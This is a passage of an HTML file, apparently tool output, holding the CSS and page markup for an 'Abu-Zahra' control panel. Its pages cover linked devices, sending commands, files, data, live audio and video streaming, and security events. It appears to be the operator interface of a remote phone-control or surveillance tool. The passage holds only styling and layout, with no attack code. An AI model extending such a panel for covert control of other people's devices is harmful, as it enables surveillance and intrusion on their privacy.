  3193→.stats-grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(180px,1fr));gap:14px;margin-bottom:24px}
  3194→.stat-card{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:18px 20px;transition:all var(--transition);position:relative;overflow:hidden}
  3195→.stat-card:hover{border-color:var(--border-light);transform:translateY(-1px);box-shadow:var(--shadow)}
  3196→.stat-card .stat-icon{width:40px;height:40px;border-radius:var(--radius-sm);display:flex;align-items:center;justify-content:center;font-size:20px;margin-bottom:10px}
  3197→.stat-card .stat-icon.blue{background:var(--blue-bg);color:var(--blue)}
  3198→.stat-card .stat-icon.green{background:var(--green-bg);color:var(--green)}
  3199→.stat-card .stat-icon.yellow{background:var(--yellow-bg);color:var(--yellow)}
  3200→.stat-card .stat-icon.purple{background:var(--purple-bg);color:var(--purple)}
  3201→.stat-card .stat-icon.red{background:var(--red-bg);color:var(--red)}
  3202→.stat-card .stat-icon.orange{background:rgba(240,136,62,.12);color:var(--orange)}
  3203→.stat-card .label{color:var(--text-secondary);font-size:12px;margin-bottom:4px;text-transform:uppercase;letter-spacing:.5px;font-weight:500}
  3204→.stat-card .value{font-size:26px;font-weight:700;line-height:1.2}
  3205→.stat-card .sub{color:var(--text-muted);font-size:11px;margin-top:4px}
  3206→
  3207→/* ========== Card ========== */
  3208→.card{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:20px;margin-bottom:16px;transition:border var(--transition)}
  3209→.card:hover{border-color:var(--border-light)}
  3210→.card h3{margin-bottom:16px;font-size:15px;font-weight:600;display:flex;align-items:center;gap:8px;color:var(--text)}
  3211→
  3212→/* ========== Filter Bar ========== */
  3213→.filter-bar{display:flex;gap:8px;margin-bottom:14px;flex-wrap:wrap;align-items:center}
  3214→.filter-bar select,.filter-bar input{padding:7px 12px;border-radius:var(--radius-xs);border:1px solid var(--border);background:var(--bg);color:var(--text);font-size:12px;outline:none;transition:border var(--transition)}
  3215→.filter-bar select:focus,.filter-bar input:focus{border-color:var(--blue)}
  3216→.filter-bar .filter-label{color:var(--text-muted);font-size:12px;white-space:nowrap}
  3217→
  3218→/* ========== Table ========== */
  3219→.table-wrap{overflow-x:auto;-webkit-overflow-scrolling:touch;border-radius:var(--radius-sm);border:1px solid var(--border)}
  3220→table{width:100%;border-collapse:collapse;min-width:500px}
  3221→th,td{padding:10px 14px;text-align:right;border-bottom:1px solid var(--border);font-size:13px}
  3222→th{color:var(--text-secondary);font-weight:600;font-size:11px;text-transform:uppercase;letter-spacing:.5px;background:var(--surface2);position:sticky;top:0}
  3223→tr:last-child td{border-bottom:none}
  3224→tr:hover td{background:var(--surface2)}
  3225→
  3226→/* ========== Badges ========== */
  3227→.badge{display:inline-flex;align-items:center;padding:2px 9px;border-radius:12px;font-size:11px;font-weight:600;gap:4px;white-space:nowrap}
  3228→.badge-green{background:var(--green-bg);color:var(--green)}
  3229→.badge-red{background:var(--red-bg);color:var(--red)}
  3230→.badge-yellow{background:var(--yellow-bg);color:var(--yellow)}
  3231→.badge-blue{background:var(--blue-bg);color:var(--blue)}
  3232→.badge-purple{background:var(--purple-bg);color:var(--purple)}
  3233→.badge-orange{background:rgba(240,136,62,.12);color:var(--orange)}
  3234→
  3235→/* ========== Buttons ========== */
  3236→.btn{padding:8px 16px;border:none;border-radius:var(--radius-sm);cursor:pointer;font-size:13px;transition:all var(--transition);display:inline-flex;align-items:center;gap:6px;font-weight:500}
  3237→.btn:active{transform:scale(.97)}
  3238→.btn-primary{background:var(--accent);color:#fff}
  3239→.btn-primary:hover{background:var(--accent-hover)}
  3240→.btn-secondary{background:var(--surface2);color:var(--text);border:1px solid var(--border)}
  3241→.btn-secondary:hover{background:var(--surface-hover);border-color:var(--border-light)}
  3242→.btn-sm{padding:5px 11px;font-size:12px}
  3243→.btn-danger{background:var(--red-bg);color:var(--red);border:1px solid rgba(248,81,73,.2)}
  3244→.btn-danger:hover{background:rgba(248,81,73,.2)}
  3245→.btn-ghost{background:transparent;color:var(--text-secondary);padding:4px 8px}
  3246→.btn-ghost:hover{color:var(--text);background:var(--surface2)}
  3247→
  3248→/* ========== Command Grid ========== */
  3249→.cmd-grid{display:grid;grid-template-columns:repeat(auto-fill,minmax(200px,1fr));gap:8px}
  3250→.cmd-btn{padding:10px 14px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--surface2);color:var(--text);cursor:pointer;font-size:12px;transition:all var(--transition);text-align:right}
  3251→.cmd-btn:hover{border-color:var(--accent);background:rgba(230,57,70,.08);transform:translateY(-1px)}
  3252→.cmd-btn:active{transform:translateY(0)}
  3253→
  3254→/* ========== Device Cards ========== */
  3255→.device-card{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:18px;cursor:pointer;transition:all var(--transition);position:relative}
  3256→.device-card:hover{border-color:var(--accent);transform:translateY(-2px);box-shadow:var(--shadow)}
  3257→.device-card .dc-header{display:flex;align-items:center;gap:10px;margin-bottom:10px}
  3258→.device-card .dc-status{width:10px;height:10px;border-radius:50%;flex-shrink:0}
  3259→.device-card .dc-status.online{background:var(--green);box-shadow:0 0 8px rgba(63,185,80,.5);animation:statusGlow 2s infinite}
  3260→.device-card .dc-status.offline{background:var(--text-muted)}
  3261→@keyframes statusGlow{0%,100%{box-shadow:0 0 4px rgba(63,185,80,.3)}50%{box-shadow:0 0 12px rgba(63,185,80,.6)}}
  3262→.device-card .dc-name{font-size:15px;font-weight:600;flex:1;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
  3263→.device-card .dc-model{color:var(--text-secondary);font-size:12px;margin-bottom:8px}
  3264→.device-card .dc-meta{display:flex;flex-wrap:wrap;gap:8px;font-size:11px;color:var(--text-muted)}
  3265→.device-card .dc-meta .meta-item{display:flex;align-items:center;gap:4px}
  3266→.device-card .dc-meta .meta-item .meta-icon{font-size:13px}
  3267→.device-cards{display:grid;grid-template-columns:repeat(auto-fill,minmax(290px,1fr));gap:14px}
  3268→
  3269→/* Battery Bar */
  3270→.battery-bar{display:inline-flex;align-items:center;gap:4px}
  3271→.battery-bar .battery-shell{width:22px;height:11px;border:1.5px solid var(--text-muted);border-radius:3px;position:relative;overflow:hidden}
  3272→.battery-bar .battery-shell::after{content:'';position:absolute;right:-4px;top:2px;width:3px;height:5px;background:var(--text-muted);border-radius:0 1px 1px 0}
  3273→.battery-bar .battery-fill{height:100%;border-radius:1px;transition:width .3s}
  3274→.battery-fill.high{background:var(--green)}
  3275→.battery-fill.mid{background:var(--yellow)}
  3276→.battery-fill.low{background:var(--red)}
  3277→.battery-text{font-size:11px;font-weight:600;min-width:28px}
  3278→
  3279→/* Signal Bars */
  3280→.signal-bars{display:inline-flex;align-items:flex-end;gap:1.5px;height:12px}
  3281→.signal-bars .bar{width:3px;border-radius:1px;background:var(--border-light);transition:background .3s}
  3282→.signal-bars .bar.active{background:var(--green)}
  3283→.signal-bars .bar:nth-child(1){height:3px}
  3284→.signal-bars .bar:nth-child(2){height:5px}
  3285→.signal-bars .bar:nth-child(3){height:8px}
  3286→.signal-bars .bar:nth-child(4){height:11px}
  3287→
  3288→/* ========== Command Log ========== */
  3289→.command-log .cmd-item{padding:12px;border:1px solid var(--border);border-radius:var(--radius-sm);margin-bottom:8px;background:var(--bg);transition:all var(--transition)}
  3290→.command-log .cmd-item:hover{border-color:var(--border-light)}
  3291→.command-log .cmd-item .cmd-header{display:flex;justify-content:space-between;align-items:center;margin-bottom:6px;gap:8px}
  3292→.command-log .cmd-item .cmd-cmd{font-family:'Cascadia Code',monospace;font-size:13px;font-weight:500}
  3293→.command-log .cmd-item .cmd-meta{color:var(--text-muted);font-size:11px;display:flex;gap:12px;flex-wrap:wrap}
  3294→.command-log .cmd-item .cmd-result{margin-top:8px;padding:10px;background:var(--surface2);border-radius:var(--radius-xs);font-size:12px;font-family:monospace;color:var(--text-secondary);max-height:200px;overflow-y:auto;word-break:break-all;white-space:pre-wrap;display:none;border:1px solid var(--border)}
  3295→.command-log .cmd-item .cmd-result.expanded{display:block}
  3296→.cmd-item .spinner{display:inline-block;width:12px;height:12px;border:2px solid var(--border);border-top-color:var(--yellow);border-radius:50%;animation:spin .8s linear infinite}
  3297→@keyframes spin{to{transform:rotate(360deg)}}
  3298→
  3299→/* ========== Event Log ========== */
  3300→.event-log{max-height:600px;overflow-y:auto}
  3301→.event-item{display:grid;grid-template-columns:1fr auto auto auto;gap:8px;padding:10px 12px;border-bottom:1px solid var(--border);font-size:12px;align-items:center;transition:background var(--transition)}
  3302→.event-item:hover{background:var(--surface2)}
  3303→.event-item .ev-time{color:var(--text-muted);font-family:monospace;font-size:11px;white-space:nowrap}
  3304→.event-item .ev-device{color:var(--blue);font-weight:500}
  3305→.event-item .ev-type{padding:2px 8px;border-radius:10px;font-size:10px;font-weight:600;text-transform:uppercase;white-space:nowrap}
  3306→.event-item .ev-type.security{background:var(--red-bg);color:var(--red)}
  3307→.event-item .ev-type.info{background:var(--blue-bg);color:var(--blue)}
  3308→.event-item .ev-type.warning{background:var(--yellow-bg);color:var(--yellow)}
  3309→.event-item .ev-type.success{background:var(--green-bg);color:var(--green)}
  3310→.event-item .ev-details{color:var(--text-secondary);grid-column:1/-1;font-size:11px}
  3311→.auto-scroll-bar{display:flex;align-items:center;gap:8px;margin-bottom:10px}
  3312→.auto-scroll-bar label{font-size:12px;color:var(--text-secondary);display:flex;align-items:center;gap:6px;cursor:pointer}
  3313→.auto-scroll-bar label input{accent-color:var(--accent)}
  3314→
  3315→/* ========== Notification Toast ========== */
  3316→.notification{position:fixed;top:20px;left:20px;background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-sm);padding:12px 20px;z-index:300;transform:translateX(calc(-100% - 40px));transition:transform .3s cubic-bezier(.4,0,.2,1);font-size:14px;box-shadow:var(--shadow-lg);display:flex;align-items:center;gap:8px}
  3317→.notification.show{transform:translateX(0)}
  3318→
  3319→/* ========== Modal ========== */
  3320→.modal-overlay{display:none;position:fixed;inset:0;background:rgba(0,0,0,.6);z-index:200;align-items:center;justify-content:center;backdrop-filter:blur(4px)}
  3321→.modal-overlay.show{display:flex}
  3322→.modal{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:24px;width:540px;max-width:90vw;max-height:80vh;overflow-y:auto;box-shadow:var(--shadow-lg)}
  3323→
  3324→/* ========== Tabs ========== */
  3325→.tabs{display:flex;gap:4px;margin-bottom:16px;flex-wrap:wrap}
  3326→.tab{padding:7px 14px;border-radius:var(--radius-sm);border:1px solid var(--border);background:transparent;color:var(--text-secondary);cursor:pointer;font-size:12px;transition:all var(--transition);font-weight:500}
  3327→.tab:hover{background:var(--surface2);color:var(--text)}
  3328→.tab.active{background:var(--accent);color:#fff;border-color:var(--accent)}
  3329→
  3330→/* ========== Log Item (legacy) ========== */
  3331→.log-item{padding:8px 0;border-bottom:1px solid var(--border);font-size:12px;display:flex;gap:12px}
  3332→.log-item .time{color:var(--text-muted);white-space:nowrap;font-family:monospace}
  3333→.log-item .event{flex:1}
  3334→
  3335→/* ========== Search Box ========== */
  3336→.search-box{display:flex;gap:8px;margin-bottom:16px}
  3337→.search-box input,.search-box select{flex:1;padding:9px 14px;border-radius:var(--radius-sm);border:1px solid var(--border);background:var(--bg);color:var(--text);font-size:13px;outline:none;transition:border var(--transition)}
  3338→.search-box input:focus,.search-box select:focus{border-color:var(--blue);box-shadow:0 0 0 3px rgba(88,166,255,.12)}
  3339→
  3340→/* ========== Empty State ========== */
  3341→.empty{text-align:center;color:var(--text-muted);padding:40px 20px;font-size:14px}
  3342→.empty .empty-icon{font-size:40px;margin-bottom:10px;opacity:.5}
  3343→
  3344→/* ========== Pulse ========== */
  3345→.pulse{animation:pulse 2s infinite}
  3346→@keyframes pulse{0%,100%{opacity:1}50%{opacity:.5}}
  3347→
  3348→/* ========== Streaming ========== */
  3349→.stream-layout{display:grid;grid-template-columns:320px 1fr;gap:16px;min-height:500px}
  3350→.stream-controls{display:flex;flex-direction:column;gap:12px}
  3351→.stream-viewer{position:relative;background:#000;border-radius:var(--radius);overflow:hidden;aspect-ratio:16/9;display:flex;align-items:center;justify-content:center}
  3352→.stream-viewer video,.stream-viewer canvas,.stream-viewer img{width:100%;height:100%;object-fit:contain}
  3353→.stream-viewer .no-stream{color:var(--text-secondary);text-align:center;font-size:15px}
  3354→.stream-viewer .stream-badge{position:absolute;top:12px;left:12px;background:rgba(230,57,70,.9);color:#fff;padding:4px 12px;border-radius:20px;font-size:12px;font-weight:600;display:flex;align-items:center;gap:6px;backdrop-filter:blur(4px)}
  3355→.stream-viewer .stream-badge.live::before{content:'';width:8px;height:8px;background:#fff;border-radius:50%;animation:pulse 1s infinite}
  3356→.stream-type-grid{display:grid;grid-template-columns:1fr 1fr 1fr;gap:8px}
  3357→.stream-type-btn{padding:14px 8px;border-radius:10px;border:2px solid var(--border);background:var(--surface2);color:var(--text);cursor:pointer;font-size:13px;transition:all var(--transition);text-align:center}
  3358→.stream-type-btn:hover{border-color:var(--accent);background:rgba(230,57,70,.05)}
  3359→.stream-type-btn.active{border-color:var(--accent);background:rgba(230,57,70,.12)}
  3360→.stream-type-btn .st-icon{font-size:28px;display:block;margin-bottom:4px}
  3361→.stream-actions{display:flex;gap:8px;flex-wrap:wrap}
  3362→.stream-actions .btn{flex:1;min-width:120px;justify-content:center;padding:12px}
  3363→.stream-info{padding:12px;background:var(--surface2);border-radius:var(--radius-sm);font-size:12px;color:var(--text-secondary)}
  3364→.stream-info div{display:flex;justify-content:space-between;padding:4px 0;border-bottom:1px solid var(--border)}
  3365→.stream-info div:last-child{border:none}
  3366→.stream-quality{display:flex;gap:6px;flex-wrap:wrap}
  3367→.stream-quality button{padding:6px 14px;border-radius:6px;border:1px solid var(--border);background:transparent;color:var(--text-secondary);cursor:pointer;font-size:12px;transition:all var(--transition)}
  3368→.stream-quality button.active{background:var(--accent);color:#fff;border-color:var(--accent)}
  3369→.audio-bars{display:flex;align-items:center;gap:3px;height:60px;padding:0 20px}
  3370→.audio-bars .bar{width:4px;background:var(--accent);border-radius:2px;transition:height .1s}
  3371→
  3372→/* ========== Relative Time ========== */
  3373→.relative-time{color:var(--text-muted);font-size:11px}
  3374→
  3375→/* ========== Responsive ========== */
  3376→@media(max-width:768px){
  3377→  .sidebar{transform:translateX(100%)}
  3378→  .sidebar.open{transform:translateX(0)}
  3379→  .sidebar-overlay.open{display:block}
  3380→  .main{margin-right:0;padding:16px;padding-top:64px}
  3381→  .hamburger{display:flex;align-items:center;justify-content:center}
  3382→  .stats-grid{grid-template-columns:repeat(2,1fr);gap:10px}
  3383→  .device-cards{grid-template-columns:1fr}
  3384→  .cmd-grid{grid-template-columns:repeat(auto-fill,minmax(150px,1fr))}
  3385→  .event-item{grid-template-columns:1fr;gap:4px}
  3386→  .event-item .ev-details{grid-column:auto}
  3387→  .global-search{max-width:100%;min-width:0}
  3388→  .stream-layout{grid-template-columns:1fr}
  3389→  .topbar h1{font-size:18px}
  3390→  .filter-bar{flex-direction:column;align-items:stretch}
  3391→  .filter-bar select,.filter-bar input{width:100%}
  3392→}
  3393→@media(max-width:480px){
  3394→  .stats-grid{grid-template-columns:1fr 1fr}
  3395→  .stat-card .value{font-size:20px}
  3396→  .stats-grid .stat-card{padding:14px 16px}
  3397→  .device-cards{grid-template-columns:1fr}
  3398→  .cmd-grid{grid-template-columns:1fr 1fr}
  3399→}
  3400→@media(min-width:1400px){
  3401→  .device-cards{grid-template-columns:repeat(auto-fill,minmax(320px,1fr))}
  3402→  .cmd-grid{grid-template-columns:repeat(auto-fill,minmax(220px,1fr))}
  3403→}
  3404→</style>
  3405→</head>
  3406→<body>
  3407→
  3408→<!-- Login Page -->
  3409→<div class="login-page" id="loginPage">
  3410→<div class="login-box">
  3411→<h1>&#x1F7E5; Abu-Zahra</h1>
  3412→<p>Control Dashboard</p>
  3413→<input type="text" id="loginUser" placeholder="Username" value="admin">
  3414→<input type="password" id="loginPass" placeholder="Password">
  3415→<button onclick="doLogin()">Login</button>
  3416→<div class="login-error" id="loginError">Invalid credentials</div>
  3417→</div>
  3418→</div>
  3419→
  3420→<!-- Hamburger -->
  3421→<button class="hamburger" id="hamburger" onclick="toggleSidebar()">&#9776;</button>
  3422→
  3423→<!-- Sidebar Overlay (mobile) -->
  3424→<div class="sidebar-overlay" id="sidebarOverlay" onclick="toggleSidebar()"></div>
  3425→
  3426→<!-- App -->
  3427→<div class="app" id="app">
  3428→<nav class="sidebar" id="sidebar">
  3429→<div class="logo">
  3430→  <h2>&#x1F7E5; Abu-Zahra</h2>
  3431→  <span>Control Panel v4.0</span>
  3432→</div>
  3433→<nav>
  3434→<a class="active" data-page="dashboard" onclick="showPage('dashboard',this)">&#x1F4CA; Dashboard</a>
  3435→<a data-page="devices" onclick="showPage('devices',this)">&#x1F4F1; Devices</a>
  3436→<a data-page="commands" onclick="showPage('commands',this)">&#x1F3AE; Commands</a>
  3437→<a data-page="files" onclick="showPage('files',this)">&#x1F4C2; Files</a>
  3438→<a data-page="data" onclick="showPage('data',this)">&#x1F4E6; Data</a>
  3439→<a data-page="streaming" onclick="showPage('streaming',this)">&#x1F4E1; Live Stream</a>
  3440→<a data-page="monitor" onclick="showPage('monitor',this)">&#x1F50D; Monitor</a>
  3441→<a data-page="events" onclick="showPage('events',this)">&#x1F4CB; Events</a>
  3442→<a data-page="settings" onclick="showPage('settings',this)">&#x2699;&#xFE0F; Settings</a>
  3443→</nav>
  3444→<div class="sidebar-footer">
  3445→<a onclick="doLogout()" style="color:var(--red)">&#x1F6AA; Logout</a>
  3446→</div>
  3447→</nav>
  3448→
  3449→<div class="main">
  3450→
  3451→<!-- ====== Dashboard Page ====== -->
  3452→<div class="page active" id="page-dashboard">
  3453→<div class="topbar">
  3454→  <h1>&#x1F4CA; Dashboard</h1>
  3455→  <div style="display:flex;align-items:center;gap:12px">
  3456→    <div class="live-indicator" id="wsIndicator">
  3457→      <span class="dot"></span>
  3458→      <span id="wsStatusText">Connecting</span>
  3459→    </div>
  3460→    <span class="time" id="clock"></span>
  3461→  </div>
  3462→</div>
  3463→<div class="stats-grid" id="statsGrid"></div>
  3464→<div class="card"><h3>&#x1F4F1; Active Devices</h3><div id="dashDevices" class="device-cards"></div></div>
  3465→<div class="card"><h3>&#x1F4CB; Recent Commands</h3><div id="dashCommands" class="command-log"></div></div>
  3466→</div>
  3467→
  3468→<!-- ====== Devices Page ====== -->
  3469→<div class="page" id="page-devices">
  3470→<div class="topbar">
  3471→  <h1>&#x1F4F1; Devices</h1>
  3472→  <button class="btn btn-primary" onclick="generateLink()">&#x1F517; Link Device</button>
  3473→</div>
  3474→<div class="global-search" style="max-width:100%;margin-bottom:16px">
  3475→  <span class="search-icon">&#x1F50D;</span>
  3476→  <input type="text" id="deviceSearch" placeholder="Search devices by name, model..." oninput="filterDevices()">
  3477→</div>
  3478→<div id="linkCodeBox" style="display:none" class="card">
  3479→  <h3>&#x1F517; Link Code</h3>
  3480→  <p id="linkCodeText" style="font-size:28px;font-weight:bold;text-align:center;color:var(--accent);letter-spacing:4px"></p>
  3481→</div>
  3482→<div class="filter-bar" id="deviceFilters">
  3483→  <span class="filter-label">Status:</span>
  3484→  <select id="deviceStatusFilter" onchange="filterDevices()">
  3485→    <option value="all">All</option>
  3486→    <option value="online">Online</option>
  3487→    <option value="offline">Offline</option>
  3488→  </select>
  3489→</div>
  3490→<div class="device-cards" id="deviceList"></div>
  3491→<div class="card" id="deviceDetail" style="display:none"></div>
  3492→</div>
  3493→
  3494→<!-- ====== Commands Page ====== -->
  3495→<div class="page" id="page-commands">
  3496→<div class="topbar"><h1>&#x1F3AE; Command Center</h1></div>
  3497→<div class="card"><h3>Send Command</h3>
  3498→  <div class="search-box"><select id="cmdDevice" style="flex:1"></select></div>
  3499→  <div class="tabs" id="cmdTabs"></div>
  3500→  <div class="cmd-grid" id="cmdGrid"></div>

[showing lines 2500-3500 of 5555; use offset=3501 with limit to continue reading]